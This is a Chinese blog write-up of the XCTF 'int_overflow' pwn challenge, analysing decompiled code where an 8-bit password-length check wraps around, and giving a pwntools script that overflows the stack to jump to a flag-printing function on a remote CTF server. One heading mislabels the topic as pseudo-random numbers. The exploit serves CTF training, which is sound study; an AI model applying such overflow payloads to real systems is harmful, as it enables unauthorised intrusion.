[攻防世界]int_overflow~巨细讲解

最新推荐文章于 2024-08-03 21:15:16 发布
最新推荐文章于 2024-08-03 21:15:16 发布
阅读量401 收藏 2
点赞数 1
分类专栏: PWN # 攻防世界 文章标签: c语言 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71081503/article/details/125084842
版权

目录

解题思路:

查保护:

找逻辑:

考点:伪随机数

脚本编写:

解题思路:

查保护:

还是正常的命令,直接在linux里面用checksec查保护,有什么保护。

查完之后发现,就有一个NX(禁止栈内执行开着),32位的,拖入ida中看看。 

找逻辑:

进入ida找main函数,进入反编译,在linux运行一下,看的是一样输出的,接着往下看你输入了一个v4,之后跟v4进行1对比,是一跳转到login,如果不是,那么输出Bye,之后退出。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp+Ch] [ebp-Ch]

  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  puts("---------------------");                // 输出
  puts("~~ Welcome to CTF! ~~");                // 输出
  puts("       1.Login       ");                // 输出
  puts("       2.Exit        ");                // 输出
  puts("---------------------");                // 输出
  printf("Your choice:");                       // 输出
  __isoc99_scanf("%d", &v4);                    // 获得你输入的值为v4
  if ( v4 == 1 )                                // 如果v4等于1
  {
    login();                                    // 跳转到login函数
  }
  else                                          // 否则
  {
    if ( v4 == 2 )                              // 如果v4等于2
    {
      puts("Bye~");                             // 输出这个字符串
      exit(0);                                  // 输出
    }
    puts("Invalid Choice!");
  }
  return 0;
}

进入login函数里面查看,翻译一下大概的意思。

char *login()
{
  char buf; // [esp+0h] [ebp-228h]
  char s; // [esp+200h] [ebp-28h]

  memset(&s, 0, 0x20u);
  memset(&buf, 0, 0x200u);
  puts("Please input your username:");          // 输出
  read(0, &s, 0x19u);                           // 从&s读取19个字节
  printf("Hello %s\n", &s);                     // 输出&s
  puts("Please input your passwd:");            // 输出
  read(0, &buf, 0x199u);                        // 读取buf的199个字节
  return check_passwd(&buf);                    // 跳转这个函数,参数是buf
}

之后继续往下一个函数,跳转函数,到达了这里,发改问题发现了。

char *__cdecl check_passwd(char *s)
{
  char *result; // eax
  char dest; // [esp+4h] [ebp-14h]
  unsigned __int8 v3; // [esp+Fh] [ebp-9h]

  v3 = strlen(s);                               // 获取v3的长度
  if ( v3 <= 3u || v3 > 8u )                    // 如果长度小于等于3或者是大于8
  {
    puts("Invalid Password");                   // 输出这个
    result = (char *)fflush(stdout);            // 缓冲
  }
  else                                          // 否则
  {
    puts("Success");                            // 输出这个
    fflush(stdout);                             // 缓冲

    result = strcpy(&dest, s);                  // 把s复制给dest
  }
  return result;                                // 返回result
}

考点:伪随机数

伪随机,这个用的是整数溢出当程序中的数据超过其数据类型的范围的时候,会出现截断,只要溢出,就会补码-1取反的操作。所以会出现很奇怪的操作,就是可以输入进去更多的数值满足满足255+3<strlen(s)<=255+8即可,开始查看一下位置,其他的伪随机数可以去了解

距离栈顶,有0x14,覆盖一个返回地址在+0x04 ,之后找个返回的地方可以获得权限的,查找字符串之后,有一个cat flag的位置,跳转带那个位置查看地址,到时候跳转位置。

跳转到 text:08048694 即可。

脚本编写:

python的pwntools库。

from pwn import *
p = remote('111.200.241.244',54294)
p.recv()
p.sendline('1')
p.recv()
p.sendline(b'aaaaa')
p.recv()
pl = b'a'*(0x14+0x04) + p32(0x08048694)
pl+=b'a'*(262-len(pl))
p.sendline(pl)
p.interactive()

获得的cyberpeace{9602ec7b43e07904f62325caa1d397eb} 

逆向萌新
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF|pwn栈溢出题目int_overflow解题思路及个人总结
skyattractive的博客
05-31 2240
CTF|pwn栈溢出题目int_overflow解题思路及个人总结 解题思路 拿到题目,标题是int_overflow 指可能是某个int型变量存在栈溢出,留意下 老规矩将题目拖到IDA放入ubuntu中查看相关信息 * stack/canary保护没开 ubuntu运行一下 简单的选择登陆 输入账号密码 返回结果 拖入IDA 反编译 查看main函数 进入login函数 login中定义两个变量buf和s,所给的栈的大小都很大,不存在栈溢出 我们继续进入check_passwd函数 这个函数只要
攻防世界 int_overflow
09-28 744
1.题目 2.IDA反汇编C程序 3.流程分析 首先,选择login或者退出,选择login,则输入名字和密码,然后校验密码长度,长度小于等于3或者大于8等密码错误,否则成功。 但是看到这里,会有疑问,成功了之后呢?flag呢?在IDA的function view查找,发现一个函数what_is_this。一个存在于原函数但是我们程序流程里面没有调用过的函数。于是思路立马清晰了。我们需要通过栈溢出来覆盖返回地址,将函数what_is_this的地址覆盖到返回地址上。 接..
如何检测整型相加溢出(overflow)
热门推荐
roaylchen的博客
07-13 2万+
前言: 本文主要讨论如何判断整型相加溢出(overflow)的问题. 我们知道计算机里面整型一般是有限个字节(4 bytes for int)表示, 正是因为只能用有限个字节表示一个整型变量, 由此带来一个可能的问题: 溢出(overflow). 所谓整型溢出(overflow), 是说一个整数的值太大或者太小导致没有用给定的有限个(比如四个字节没法存超过2^31 – 1的有符号正整数)字节
攻防世界-pwn新手区-int_overflow
CHAWUCIREN1的博客
08-10 263
看题目就知道是整形溢出 运行一下 检查一下保护机制 丢入32位ida里面 发现一个函数 可以通过覆盖跳转到这个函数就可以拿到flag system_addr = 0x804868B check_passwd处有一个判定,输入的数字要在3和8之间否则就直接退出 在这里需要说明一下,这个unsigned int就是无符号的整型,我们要知道,在计算机中,所有的数据指令都是以二进制的形式存在的,010101这样,那么正负数怎么存在呢,这里就有一个符号位,一般是在一段数据的第一个位置 比如260的十六进制
攻防世界 int_overflow 超超超详细
PushSafe
10-23 2649
pwn纯新手教程 如有错误的地方 希望各位大佬们指出. 整数溢出 int_overflow 整数分为有符号(int)和无符号(unsigned int)两种类型 有符号数以最高位作为其符号位 即正整数最高位为 1,负数为 0 无符号数取值范围为非负数 常见各类型占用字节数如下: 类型 字节 取值范围 int 4 -2147483648~2147483647 short int 2
int_overflow [XCTF-PWN]CTF writeup系列9
重新启程
12-20 946
题目地址:int_overflow 先看看题目内容: 这道题目的名字已经把漏洞说明白了,就是整数溢出漏洞 那我们就照例下载文件,检查保护机制 root@mypwn:/ctf/work/python# checksec abd631bc00e445608f5f2af2cb0c151a [*] '/ctf/work/python/abd631bc00e445608f5f2af2cb0c...
PWN-整型溢出-攻防世界-PWN-int_overflow
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 1906
目录 整型溢出漏洞是什么 攻防世界-PWN-int_overflow exp 整型溢出漏洞是什么 整型是一个特定的变量类型,在32位的系统中,一个整数一般占32位,而在64位的系统中一个整数占64位,(下面主要介绍32位整型溢出)为了表示正负(有符号),需要最高位来决定数值的,下面列举一些常见的整型的数值范围 在c语言中有这样的规定: 对于unsigned整型的溢出,溢出之后的数会和2^(8*字节)作模运算,例如一个unsigned char 溢出了,就会把溢出的数值与256求模 .
攻防世界pwn int_overflow writeup
PLpa的博客
07-07 1845
这是一道整数溢出题 我们知道,整数溢出本身不一定会对程序造成很大的伤害,但是他会造成其他形式的溢出,从而也十分的危险。 拿到题目,我们首先查看一下源代码的保护情况: 从上图可以看出,这是一个32位的程序,并且只开了堆栈不可执行的保护。 我们使用IDA查看一下源码: 我们进入这个check_passwd函数: 当v3>3u且v3<8u时,我们可以进入下面的else中。 else中把...
攻防世界 m0_01讲解
qq_53105813的博客
07-31 2297
思路总结
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界miss-01,杂项misc太湖杯
11-01
标题 "攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
程序设计基础(c语言)_补充_2
renewal_m的博客
08-03 166
定义整型变量a,并输入一个整数到a,请编写程序分别按十进制,八进制和十六进制输出a的值。
C语言基础题:迷宫寻路(C语言版)
最新发布
我就知道你会来,我们一起进步吧!
08-03 492
路线如下:(1,1)→(2,1)→(3,1)→(3,2)→(3,3)→(2,3)→(2,4)→(2,5)→(3,5)迷宫可以视为一个n x m 矩阵,每个位置要么是空地,要么是墙。机器猫只能从一个空地走到其上、下、左、右的空地。对于 100% 的数据,保证1< n,m < 100,(1,1)和(n,m)均为空地。每行输入一个长为 m 的字符串,#表示墙,. 表示空地。如果机器猫能走到(n,m),则输出 Yes;机器猫初始时位于(1,1)的位置,问能否走到(n,m)位置。第一行,两个正整数 n,m。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1740
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
读零信任网络:在不可信网络中构建安全系统07设备信任
lyingSeven的博客
08-03 442
设备安全
攻防世界guess_num
08-31
攻防世界guess_num是一个题目,它要求玩家猜测一个数字并输入。根据引用的结果"cyberpeace{a6473686121bdc644837b076c3207788}",可以猜测这个题目的答案可能是"a6473686121bdc644837b076c3207788"。PIE和ASLR是一些防护技术,用于增加程序的安全性,防止恶意利用程序的特定漏洞进行攻击。PIE(position-independent executable)使得加载程序时每次都变换加载地址,防止ROP攻击。ASLR(Address Space Layout Randomization)则使得栈帧起始地址随机化,增加攻击者猜测需要攻击位置的难度。这些技术可以提高程序的安全性,减少被攻击的风险。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [[攻防世界]guess_num](https://blog.csdn.net/m0_71081503/article/details/125075359)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

逆向萌新

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值